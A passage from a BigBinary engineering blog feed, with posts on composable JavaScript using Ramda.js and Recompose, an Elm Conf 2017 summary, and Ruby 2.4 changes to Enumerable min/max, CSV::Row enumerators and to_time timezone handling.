      <link href="https://www.bigbinary.com/blog/optimize-javascript-code-for-composability-with-ramdajs"/>
      <updated>2017-10-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/optimize-javascript-code-for-composability-with-ramdajs</id>
      <content type="html"><![CDATA[<p>In this blog <code>R</code> stands for <a href="http://ramdajs.com/">Ramda.js</a>. More on this later.</p><p>Here is code without R.</p><pre><code class="language-javascript">function isUnique(element, selector) {  const parent = element.parentNode;  const elements = parents.querySelectorAll(selector);  return elements.length === 1 &amp;&amp; elements[0] === element;}</code></pre><p>Code with R.</p><pre><code class="language-javascript">function isUnique(element, selector) {  const querySelectorAll = R.invoker(1, 'querySelectorAll')(selector);  return R.pipe(    R.prop('parentNode'),    querySelectorAll,    elements =&gt; R.both(                  R.equals(R.length(elements), 1),                  R.equals(elements[0], element)                );  )();}</code></pre><p>Is the refactored code better ?</p><p>What is R? What's invoker? What's pipe?</p><p>The &quot;code without R&quot; reads fine and even a person who has just started learningJavaScript can understand it. Then why take all this extra complexity. Shouldn'twe be writing code that is easier to understand ?</p><p>Good questions. Who could be against writing code that is easier to understand.</p><p>If all I'm writing is a function called <code>isUnique</code> then of course the &quot;beforeversion&quot; is simpler. However this function is part of a bigger thousands oflines of code software.</p><p>A big software is nothing but a collection of smaller pieces of code. We composecode together to make code work.</p><p>We need to optimize for composability and as we write code that is morecomposable, we are finding that composable code is also easier to read.</p><p>At BigBinary we have been experimenting with composability. We previously<a href="https://blog.bigbinary.com/2017/09/12/using-recompose-to-build-higher-order-components.html">wrote a blog</a>on how using <a href="https://github.com/acdlite/recompose">Recompose</a> is making ourReact components more composable.</p><p>Now we are trying same techniques at pure JavaScript level using Ramda.js.</p><p>Let's take a look at another examples.</p><h3>Example 2</h3><p>We have a list of users with name and status.</p><pre><code class="language-javascript">var users = [  { name: &quot;John&quot;, status: &quot;Active&quot; },  { name: &quot;Mike&quot;, status: &quot;Inactive&quot; },  { name: &quot;Rachel&quot;, status: &quot;Active&quot; },];</code></pre><p>We need to find all active users. Here is a version without R.</p><p><a href="https://jsfiddle.net/neerajsingh0101/wuLc4gqL/5">jsfiddle</a>{:.code-link}</p><pre><code class="language-javascript">var activeUsers = function (users) {  return users.filter(function (user) {    var status = user.status;    return status === &quot;Active&quot;;  });};</code></pre><p>Here is code with R.</p><p><a href="https://jsfiddle.net/neerajdotname/9gvsf92g/7/">jsfiddle</a>{:.code-link}</p><pre><code class="language-javascript">var isStatusActive = R.propSatisfies(R.equals(&quot;Active&quot;), &quot;status&quot;);var active = R.filter(isStatusActive);var result = active(users);</code></pre><p>Now let's say that user data changes and we have a user with an empty name. Wedon't want to include such users. Now data looks like this.</p><pre><code class="language-javascript">var users = [  { name: &quot;John&quot;, status: &quot;Active&quot; },  { name: &quot;Mike&quot;, status: &quot;Inactive&quot; },  { name: &quot;Rachel&quot;, status: &quot;Active&quot; },  { name: &quot;&quot;, status: &quot;Active&quot; },];</code></pre><p>Here is modified code without R.</p><p><a href="https://jsfiddle.net/neerajdotname/wuLc4gqL/6">jsfiddle</a>{:.code-link}</p><pre><code class="language-javascript">var activeUsers = function (users) {  return users.filter(function (user) {    var status = user.status;    var name = user.name;    return (      name !== null &amp;&amp;      name !== undefined &amp;&amp;      name.length !== 0 &amp;&amp;      status === &quot;Active&quot;    );  });};</code></pre><p>Here is modified code with R.</p><p><a href="https://jsfiddle.net/neerajdotname/9gvsf92g/8/">jsfiddle</a>{:.code-link}</p><pre><code class="language-javascript">var isStatusActive = R.propSatisfies(R.equals(&quot;Active&quot;), &quot;status&quot;);var active = R.filter(isStatusActive);var isNameEmpty = R.propSatisfies(R.isEmpty, &quot;name&quot;);var rejectEmptyNames = R.reject(isNameEmpty);var result = R.pipe(active, rejectEmptyNames)(users);log(result);</code></pre><p>Notice that change we needed to do to accommodate this request.</p><p>In the none R version, we had to get into the gut of the function and add logic.In the with R version we added new function and we just composed this newfunction with old function using <a href="http://ramdajs.com/docs/#pipe">pipe</a>. We didnot change the existing function.</p><p>Now let's say that we don't want all the users but just the first two users. Weknow what need to change in the without R version. In the with R version all weneed to do is add <code>R.take(2)</code> and no existing function changes at all.</p><p>Here is the final code.</p><p><a href="https://jsfiddle.net/neerajdotname/9gvsf92g/9">jsfiddle</a>{:.code-link}</p><pre><code class="language-javascript">var isStatusActive = R.propSatisfies(R.equals(&quot;Active&quot;), &quot;status&quot;);var active = R.filter(isStatusActive);var isNameEmpty = R.propSatisfies(R.isEmpty, &quot;name&quot;);var rejectEmptyNames = R.reject(isNameEmpty);var result = R.pipe(active, rejectEmptyNames, R.take(2))(users);log(result);</code></pre><h2>Data comes at the end</h2><p>Another thing to notice is that in the R version nowhere we have said that weare acting on the users. All the functions have no mention of <code>users</code>. In factall the functions do not take any argument explicitly since the functions arecurried. When we want result then we are passing <code>users</code> as the argument but itcould be <code>articles</code> and our code will still hold.</p><p>This is<a href="http://randycoulman.com/blog/2016/06/21/thinking-in-ramda-pointfree-style/">pointfree programming</a>.We do not need to know about &quot;pointfree&quot; since this comes naturally when writewith R.</p><h2>I'm still not convinced that Ramda.js is solving any real problem</h2><p>No problem.</p><p>Please watch<a href="https://www.youtube.com/watch?v=m3svKOdZijA">Hey Underscore, You're doing it wrong</a>video by <a href="https://twitter.com/drboolean">Brian Lonsdorf</a>. Hopefully that willconvince you to give Ramda.js a try.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/m3svKOdZijA&quot;frameborder=&quot;0&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote><p>If you are still not convinced then, the author of Ramda.js has written a seriesof blogs called<a href="http://randycoulman.com/blog/categories/thinking-in-ramda/">Thinking in Ramda</a>.Please read the blogs. Slowly.</p><h2>Ramda brings functional concepts to JavaScript</h2><p>Functional programming is another way of thinking about the code. When we moveto Elm, Haskell or Elixir to get functional concepts then we are wrestling withtwo things at once - a new language and functional concepts.</p><p>Ramda.js brings functional concepts to JavaScript. In this way we can slowlystart using functional concepts in our day to day JavaScript code.</p><p>The best part is that if you write any JavaScript code then you can start usingRamda.js today. Whether you are using React.js or Angular.js, it's allJavaScript and you can use Ramda.js.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Elm Conf 2017 Summary]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/elm-conf-2017-summary"/>
      <updated>2017-10-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/elm-conf-2017-summary</id>
      <content type="html"><![CDATA[<p>I attended <a href="https://www.elm-conf.us">Elm Conf 2017 US</a> last week alongside<a href="https://www.thestrangeloop.com/">Strangeloop conference</a>. I was looking forwardto the conference to know what the Elm community is working on and what problemspeople are facing and what are they doing to overcome those.</p><p>After attending the conference, I can say that Elm community is growing strong.The conference was attended by around 350 people and many were using Elm inproduction. More number of people wanted to try Elm in production.</p><p>There was a lot of enthusiasm about starting new Elm meetups. As a Ruby on Railsand React meetup organizer myself, I was genuinely interested in hearingexperiences of seasoned meetup organizers. In general Evan and Richard prefermeetup to be a place where people form small groups and hack on something ratherthan one person teaching the whole group something.</p><p>I liked all the <a href="https://www.elm-conf.us/talks/">talks</a>. There was variety inthe topics and the speakers were all seasoned. Kudos to the organizers forputting up a great program. Below is a quick summary of my thoughts from theconference.</p><h3>Keynote by Evan</h3><p><a href="https://twitter.com/czaplic">Evan</a> talked about the work he has been doing forthe upcoming release of Elm. He discussed the optimization work related to codesplitting, code generation and minification for speeding up building anddelivering single page apps using Elm. He made another interesting point that hechanged the codegen which generates the JS code from Elm code twice but nobodynoticed it. Things like this can give a huge opportunity to change and improveexisting designs which he has been doing for the upcoming release.</p><p>In the end he mentioned that his philosophy is not to rush things. It's betterto do things right than doing it now.</p><p>After the keynote, he encouraged people to talk to him about what they areworking on which was really nice.</p><h3>Accessibility with Elm</h3><p><a href="https://twitter.com/t_kelly9">Tessa</a> talked about her work around adding<a href="http://package.elm-lang.org/packages/tesk9/elm-html-a11y">accessibility support</a>for Elm apps. She talked about design decisions, prior art and some of thechallenges she faced while working on the library like working with tabs,interactive elements and images. There was a question at the end about whetherthis will be incorporated into Elm core but Evan mentioned that it might takesome time.</p><h3>Putting the Elm Platform in the Browser</h3><p><a href="https://twitter.com/ellie_editor">Luke</a>, the creator of<a href="https://ellie-app.com/">Ellie</a> - a way to easily share your elm code withothers online - talked about how he started with Ellie. He talked about theproblems he had to face for implementing and sustaining Ellie through ads.During the talk, he also open sourced the code, so we can see it on<a href="https://github.com/lukewestby/ellie">Github</a> now.</p><p>Luke mentioned how he changed the architecture of Ellie from mostly running onthe server to running in the browser using service workers. He discussed futureplans about sustaining Ellie, building an Elm editor instead of usingCodemirror, getting rid of ads and making Ellie better for everyone.</p><h3>The Importance of Ports</h3><p>In other frameworks like <a href="http://www.purescript.org/">PureScript</a> and<a href="https://bucklescript.github.io/">BuckleScript</a> invoking native JavaScriptfunctions is easy. In Elm one has to use &quot;Ports&quot;. Using Ports requires someextra stuff. In return we get more safety.</p><p><a href="https://twitter.com/splodingsocks">Murphy Randle</a> presented a case where he wasusing too many ports which was resulting in fragmented code. He discussed howport is based on <a href="https://en.wikipedia.org/wiki/Actor_model">Actor Model</a> andonce we get that then using port would be much easier. He also showed refactoredcode.</p><p>Murphy also runs Elm Town Podcast (Link is not available). Listen to episode 13to know more about Ports.</p><h3>Keynote by Richard Feldman</h3><p><a href="https://twitter.com/rtfeldman">Richard</a> talked about his experiences inteaching beginners about Elm. He has taught Elm a lot. He has done an extensiveElm course on <a href="https://frontendmasters.com/workshops/elm">Front end masters</a>. Heis currently writing<a href="https://www.manning.com/books/elm-in-action">Elm in Action book</a>.</p><p>He talked about finding motivation to teach using the<a href="http://edglossary.org/swbat/">SWBAT technique</a>. It helped him in deciding theagenda and finding the direct path for teaching. He mentioned that in thebeginning being precise and detailed is not important. This resonated with me asthe most important thing for anyone who is getting started is getting startedwith the most basic things and then iterating over it again and again.</p><h3>Parting thoughts</h3><p>Elm community is small, tight, very friendly and warm. Lots of people are tryinga lot of cool things. <a href="https://elmlang.herokuapp.com/">Elm Slack</a> came in thediscussions again and again as a good place to seek out help for beginners.</p><p>When I heard about Elm first, it was about good compiler errors and having runtime safety. However after attending the conference I am mighty impressed withthe Elm community.</p><p>Big props to <a href="https://twitter.com/brianhicks">Brian</a> and<a href="https://twitter.com/ellie_editor">Luke</a> for organizing the conference!</p><p>All the videos from the conference are already getting<a href="https://www.youtube.com/watch?v=P3pL85n9_5s&amp;list=PLglJM3BYAMPFTT61A0Axo_8n0s9n9CixA">uploaded here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 has optimized enumerable min max methods]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-0-has-optimized-enumerable-min-max-methods"/>
      <updated>2017-09-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-0-has-optimized-enumerable-min-max-methods</id>
      <content type="html"><![CDATA[<p>Enumerables in Ruby have <code>min</code>, <code>max</code> and <code>minmax</code> comparison methods which arequite convenient to use.</p><pre><code class="language-ruby">(1..99).min #=&gt; 1(1..99).max #=&gt; 99(1..99).minmax #=&gt; [1, 99]</code></pre><p>In Ruby 2.4, <code>Enumurable#min</code>, <code>Enumurable#max</code><a href="https://github.com/ruby/ruby/commit/3dcd4b2a98e">methods</a> and<code>Enumurable#minmax</code> <a href="https://github.com/ruby/ruby/commit/9f44b77a18d">method</a>are now more optimized.</p><p>We would run the following benchmark snippet for both Ruby 2.3 and Ruby 2.4 andobserve the results</p><pre><code class="language-ruby">require 'benchmark/ips'Benchmark.ips do |bench|NUM1 = 1_000_000.times.map { rand }ENUM_MIN = Enumerable.instance_method(:min).bind(NUM1)ENUM_MAX = Enumerable.instance_method(:max).bind(NUM1)ENUM_MINMAX = Enumerable.instance_method(:minmax).bind(NUM1)bench.report('Enumerable#min') doENUM_MIN.callendbench.report('Enumerable#max') doENUM_MAX.callendbench.report('Enumerable#minmax') doENUM_MINMAX.callendend</code></pre><h4>Results for Ruby 2.3</h4><pre><code class="language-ruby">Warming up --------------------------------------Enumerable#min 1.000 i/100msEnumerable#max 1.000 i/100msEnumerable#minmax 1.000 i/100msCalculating -------------------------------------Enumerable#min 14.810 (13.5%) i/s - 73.000 in 5.072666sEnumerable#max 16.131 ( 6.2%) i/s - 81.000 in 5.052324sEnumerable#minmax 11.758 ( 0.0%) i/s - 59.000 in 5.026007s</code></pre><h4>Ruby 2.4</h4><pre><code class="language-ruby">Warming up --------------------------------------Enumerable#min 1.000 i/100msEnumerable#max 1.000 i/100msEnumerable#minmax 1.000 i/100msCalculating -------------------------------------Enumerable#min 18.091 ( 5.5%) i/s - 91.000 in 5.042064sEnumerable#max 17.539 ( 5.7%) i/s - 88.000 in 5.030514sEnumerable#minmax 13.086 ( 7.6%) i/s - 66.000 in 5.052537s</code></pre><p>From the above benchmark results, it can be seen that there has been animprovement in the run times for the methods.</p><p>Internally Ruby has changed the logic by which objects are compared, whichresults in these methods being optimized. You can have a look at the commits<a href="https://github.com/ruby/ruby/commit/9f44b77a18d">here</a> and<a href="https://github.com/ruby/ruby/commit/3dcd4b2a98e">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[CSV::Row#each etc. return enumerator when no block given]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/csv-row-each-and-delete-if-return-enumerator-when-no-block-given"/>
      <updated>2017-09-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/csv-row-each-and-delete-if-return-enumerator-when-no-block-given</id>
      <content type="html"><![CDATA[<p>In Ruby 2.3, These methods do not return enumerator when no block is given.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">CSV::Row.new(%w(banana mango), [1,2]).each #=&gt; #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;CSV::Row.new(%w(banana mango), [1,2]).delete_if #=&gt; #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;</code></pre><p>Some methods raise exception because of this behavior.</p><pre><code class="language-ruby">&gt; ruby -rcsv -e 'CSV::Table.new([CSV::Row.new(%w{banana mango}, [1, 2])]).by_col.each' #=&gt; /Users/sushant/.rbenv/versions/2.3.0/lib/ruby/2.3.0/csv.rb:850:in `block in each': undefined method `[]' for nil:NilClass (NoMethodError)  from /Users/sushant/.rbenv/versions/2.3.0/lib/ruby/2.3.0/csv.rb:850:in `each'  from /Users/sushant/.rbenv/versions/2.3.0/lib/ruby/2.3.0/csv.rb:850:in `each'  from -e:1:in `&lt;main&gt;'</code></pre><p>Ruby 2.4<a href="https://github.com/ruby/ruby/commit/b425d4f19ad9efaefcb1a767a6ea26e6d40e3985">fixed this issue</a>.</p><h3>Ruby 2.4</h3><pre><code class="language-ruby">CSV::Row.new(%w(banana mango), [1,2]).each #=&gt; #&lt;Enumerator: #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;:each&gt;CSV::Row.new(%w(banana mango), [1,2]).delete_if #=&gt; #&lt;Enumerator: #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;:delete_if&gt;</code></pre><p>As we can see, these methods now return an enumerator when no block is given.</p><p>In Ruby 2.4 following code will not raise any exception.</p><pre><code class="language-ruby">&gt; ruby -rcsv -e 'CSV::Table.new([CSV::Row.new(%w{banana mango}, [1, 2])]).by_col.each'</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 DateTime#to_time & Time#to_time keeps info]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/to-time-preserves-time-zone-info-in-ruby-2-4"/>
      <updated>2017-09-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/to-time-preserves-time-zone-info-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, <code>DateTime#to_time</code> and <code>Time#to_time</code> methods can be used to return aTime object.</p><p>In Ruby 2.3, these methods convert time into system timezone offset instead ofpreserving timezone offset of the receiver.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; #&lt;DateTime: 2017-05-16T10:15:30+09:00 ((2457890j,4530s,0n),+32400s,2299161j)&gt;&gt; datetime.to_time #=&gt; 2017-05-16 06:45:30 +0530&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 06:45:30 +0530</code></pre><p>As you can see, <code>DateTime#to_time</code> and <code>Time#to_time</code> methods return time insystem timezone offset <code>+0530</code>.</p><p>Ruby 2.4 fixed<a href="https://github.com/ruby/ruby/commit/5f11a6eb6cca740b08384d1e4a68df643d98398c">DateTime#to_time</a>and<a href="https://github.com/ruby/ruby/commit/456523e2ede3073767fd8cb73cc4b159c3608890">Time#to_time</a>.</p><p>Now, <code>DateTime#to_time</code> and <code>Time#to_time</code> preserve receiver's timezone offsetinfo.</p><h3>Ruby 2.4</h3><pre><code class="language-ruby">&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; #&lt;DateTime: 2017-05-16T10:15:30+09:00 ((2457890j,4530s,0n),+32400s,2299161j)&gt;&gt; datetime.to_time #=&gt; 2017-05-16 10:15:30 +0900&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 10:15:30 +0900</code></pre><p>Since this is a breaking change for Rails application upgrading to ruby 2.4,Rails 4.2.8 built a compatibility layer by adding a<a href="https://github.com/rails/rails/commit/c9c5788a527b70d7f983e2b4b47e3afd863d9f48">config option</a>.<code>ActiveSupport.to_time_preserves_timezone</code> was added to control how <code>to_time</code>handles timezone offsets.</p><p>Here is an example of how application behaves when <code>to_time_preserves_timezone</code>is set to <code>false</code>.</p><pre><code class="language-ruby">&gt; ActiveSupport.to_time_preserves_timezone = false&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; Tue, 16 May 2017 10:15:30 +0900&gt; datetime.to_time #=&gt; 2017-05-16 06:45:30 +0530&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 06:45:30 +0530</code></pre><p>Here is an example of how application behaves when <code>to_time_preserves_timezone</code>is set to <code>true</code>.</p><pre><code class="language-ruby">&gt; ActiveSupport.to_time_preserves_timezone = true&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; Tue, 16 May 2017 10:15:30 +0900&gt; datetime.to_time #=&gt; 2017-05-16 10:15:30 +0900&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 10:15:30 +0900</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Using Recompose to build higher-order components]]></title>
       <author><name>Arbaaz</name></author>
      <link href="https://www.bigbinary.com/blog/using-recompose-to-build-higher-order-components"/>
      <updated>2017-09-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-recompose-to-build-higher-order-components</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/acdlite/recompose">Recompose</a> is a toolkit for writing Reactcomponents using higher-order components. Recompose allows us to write manysmaller higher-order components and then we compose all those componentstogether to get the desired component. It improves both readability and themaintainability of the code.</p><p><a href="https://facebook.github.io/react/docs/higher-order-components.html">HigherOrderComponents</a>are also written as <code>HOC</code>. Going forward we will use <code>HOC</code> to refer tohigher-order components.</p><h2>Using Recompose in an e-commerce application</h2><p>We are working on an e-commerce application and we need to build payment page.Here are the modes of payment.</p><ul><li>Online</li><li>Cash on delivery</li><li>Swipe on delivery</li></ul><p>We need to render our React components depending upon the payment mode selectedby the user. Typically we render components based on some state.</p><p>Here is the traditional way of writing code.</p><pre><code class="language-javascript">state = {  showPayOnlineScreen: true,  showCashOnDeliveryScreen: false,  showSwipeOnDeliveryScreen: false,}renderMainScreen = () =&gt; {  const { showCashOnDeliveryScreen, showSwipeOnDeliveryScreen } = this.state;  if (showCashOnDeliveryScreen) {    return &lt;CashOnDeliveryScreen /&gt;;  } else if (showSwipeOnDeliveryScreen) {    return &lt;SwipeOnDeliveryScreen /&gt;;  }  return &lt;PayOnlineScreen /&gt;;} render() {  return (    { this.renderMainScreen() }  ); }</code></pre><p>We will try to refactor the code using the tools provided by <em>Recompose</em>.</p><p>In general, the guiding principle of functional programming is composition. Sohere we will assume that the default payment mechanism is <em>online</em>. If thepayment mode happens to be something else then we will take care of it byenhancing the existing component.</p><p>So to start with our code would look like this.</p><pre><code class="language-javascript">state = {  paymentType: online,}render() {  return (    &lt;PayOnline {...this.state} /&gt;  );}</code></pre><p>First let's handle the case of payment mode <em>CashOnDelivery</em>.</p><pre><code class="language-javascript">import { branch, renderComponent, renderNothing } from 'recompose';import CashScreen from 'components/payments/cashScreen';const cashOnDelivery = 'CASH_ON_DELIVERY';const enhance = branch(  (props) =&gt; (props.paymentType === cashOnDelivery)  renderComponent(CashScreen),  renderNothing)</code></pre><p>Recompose has<a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#branch">branch</a>function which acts like a ternary operator.</p><p>The <code>branch</code> function accepts three arguments and returns a <code>HOC</code>. The firstargument is a<a href="https://en.wikipedia.org/wiki/Predicate_(mathematical_logic)">predicate</a>which accepts props as the argument and returns a <em>Boolean</em> value. The secondand third arguments are higher-order components. If the predicate evaluates to<strong>true</strong> then the <strong>left HOC</strong> is rendered otherwise the <strong>right HOC</strong> isrendered. Here is how <code>branch</code> is implemented.</p><pre><code class="language-javascript">branch(  test: (props: Object) =&gt; boolean,  left: HigherOrderComponent,  right: ?HigherOrderComponent): HigherOrderComponent</code></pre><p>Notice the question mark in <code>?HigherOrderComponent</code>. It means that the thirdargument is optional.</p><p>If you are familiar with <a href="http://ramdajs.com">Ramda</a> then this is similar to<a href="http://ramdajs.com/docs/#ifElse">ifElse</a> in Ramda.</p><p><a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendercomponent">renderComponent</a>takes a component and returns an HOC version of it.</p><p><a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendernothing">renderNothing</a>is an HOC which will always render <code>null</code>.</p><p>Since the third argument to <code>branch</code> is optional, we do not need to supply it.If we don't supply the third argument then that means the original componentwill be rendered.</p><p>So now we can make our code shorter by removing usage of <code>renderNothing</code>.</p><pre><code class="language-javascript">const enhance = branch(  (props) =&gt; (props.paymentType === cashOnDelivery)  renderComponent(CashScreen))const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Next condition is handling SwipeOnDelivery</h3><p>SwipeOnDelivery means that upon delivery customer pays using credit card using<a href="https://squareup.com">Square</a> or a similar tool.</p><p>We will follow the same pattern and the code might look like this.</p><pre><code class="language-javascript">import { branch, renderComponent } from 'recompose';import CashScreen from 'components/payments/CashScreen';import PayOnlineScreen from 'components/payments/PayOnlineScreen';import CardScreen from 'components/payments/CardScreen';const cashOnDelivery = 'CASH_ON_DELIVERY';const swipeOnDelivery = 'SWIPE_ON_DELIVERY';let enhance = branch(  (props) =&gt; (props.paymentType === cashOnDelivery)  renderComponent(CashScreen),)enhance = branch(  (props) =&gt; (props.paymentType === swipeOnDelivery)  renderComponent(CardScreen),)(enhance)const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Extracting out predicates</h3><p>Let's extract predicates into their own functions.</p><pre><code class="language-javascript">import { branch, renderComponent } from &quot;recompose&quot;;import CashScreen from &quot;components/payments/CashScreen&quot;;import PayOnlineScreen from &quot;components/payments/PayOnlineScreen&quot;;import CardScreen from &quot;components/payments/CardScreen&quot;;const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;// predicatesconst isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;let enhance = branch(isCashOnDelivery, renderComponent(CashScreen));enhance = branch(isSwipeOnDelivery, renderComponent(CardScreen))(enhance);const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Adding one more payment method</h3><p>Let's say that next we need to add support for<a href="https://bitcoin.org/en">Bitcoin</a>.</p><p>We can use the same process.</p><pre><code class="language-javascript">const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;const bitcoinOnDelivery = &quot;BITCOIN_ON_DELIVERY&quot;;const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;const isBitcoinOnDelivery = ({ paymentType }) =&gt;  paymentType === bitcoinOnDelivery;let enhance = branch(isCashOnDelivery, renderComponent(CashScreen));enhance = branch(isSwipeOnDelivery, renderComponent(CardScreen))(enhance);enhance = branch(isBitcoinOnDelivery, renderComponent(BitcoinScreen))(enhance);const MainScreen = enhance(PayOnlineScreen);</code></pre><p>You can see the pattern and it is getting repetitive and boring. We can chainthese conditions together to make it less repetitive.</p><p>Let's use the<a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#compose">compose</a>function and chain them.</p><pre><code class="language-javascript">const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;const cashOnDeliveryCondition = branch(  isCashOnDelivery,  renderComponent(CashScreen));const swipeOnDeliveryCondition = branch(  isSwipeOnDelivery,  renderComponent(CardScreen));const enhance = compose(cashOnDeliveryCondition, swipeOnDeliveryCondition);const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Refactoring code to remove repetition</h3><p>At this time we are building a condition (like <em>cashOnDeliveryCondition</em>) foreach payment type and then using that condition in <code>compose</code>. We can put allsuch conditions in an array and then we can use that array in <code>compose</code>. Let'ssee it in action.</p><pre><code class="language-javascript">const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;const states = [  {    when: isCashOnDelivery,    then: CashOnDeliveryScreen,  },  {    when: isSwipeOnDelivery,    then: SwipeOnDeliveryScreen,  },];const componentsArray = states.map(({ when, then }) =&gt;  branch(when, renderComponent(then)));const enhance = compose(...componentsArray);const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Extract function for reusability</h3><p>We are going to extract some code in <code>utils</code> for better reusability.</p><pre><code class="language-javascript">// utils/composeStates.jsimport { branch, renderComponent, compose } from &quot;recompose&quot;;export default function composeStates(states) {  const componentsArray = states.map(({ when, then }) =&gt;    branch(when, renderComponent(then))  );  return compose(...componentsArray);}</code></pre><p>Now our main code looks like this.</p><pre><code class="language-javascript">import composeStates from &quot;utils/composeStates.js&quot;;const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;const states = [  {    when: isCashOnDelivery,    then: CashScreen,  },  {    when: isSwipeOnDelivery,    then: CardScreen,  },];const enhance = composeStates(states);const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Full before and after comparison</h3><p>Here is before code.</p><pre><code class="language-javascript">import React, { Component } from &quot;react&quot;;import PropTypes from &quot;prop-types&quot;;import { connect } from &quot;react-redux&quot;;import { browserHistory } from &quot;react-router&quot;;import { Modal } from &quot;react-bootstrap&quot;;import * as authActions from &quot;redux/modules/auth&quot;;import PaymentsModalBase from &quot;../../components/PaymentsModal/PaymentsModalBase&quot;;import PayOnlineScreen from &quot;../../components/PaymentsModal/PayOnlineScreen&quot;;import CashScreen from &quot;../../components/PaymentsModal/CashScreen&quot;;import CardScreen from &quot;../../components/PaymentsModal/CardScreen&quot;;@connect(() =&gt; ({}), { ...authActions })export default class PaymentsModal extends Component {  static propTypes = {    show: PropTypes.bool.isRequired,    hideModal: PropTypes.func.isRequired,    orderDetails: PropTypes.object.isRequired,  };  static defaultProps = {    show: true,    hideModal: () =&gt; {      browserHistory.push(&quot;/&quot;);    },    orderDetails: {},  };  state = {    showOnlineScreen: true,    showCashScreen: false,    showCardScreen: false,  };  renderScreens = () =&gt; {    const { showCashScreen, showCardScreen } = this.state;    if (showCashScreen) {      return &lt;CashScreen /&gt;;    } else if (showCardScreen) {      return &lt;CardScreen /&gt;;    }    return &lt;PayOnlineScreen /&gt;;  };  render() {    const { show, hideModal, orderDetails } = this.props;    return (      &lt;Modal show={show} onHide={hideModal} dialogClassName=&quot;modal-payments&quot;&gt;        &lt;PaymentsModalBase orderDetails={orderDetails} onHide={hideModal}&gt;          {this.renderScreens()}        &lt;/PaymentsModalBase&gt;      &lt;/Modal&gt;    );  }}</code></pre><p>Here is after applying recompose code.</p><pre><code class="language-javascript">import React, { Component } from &quot;react&quot;;import PropTypes from &quot;prop-types&quot;;import { connect } from &quot;react-redux&quot;;import { Modal } from &quot;react-bootstrap&quot;;import { compose, branch, renderComponent } from &quot;recompose&quot;;import * as authActions from 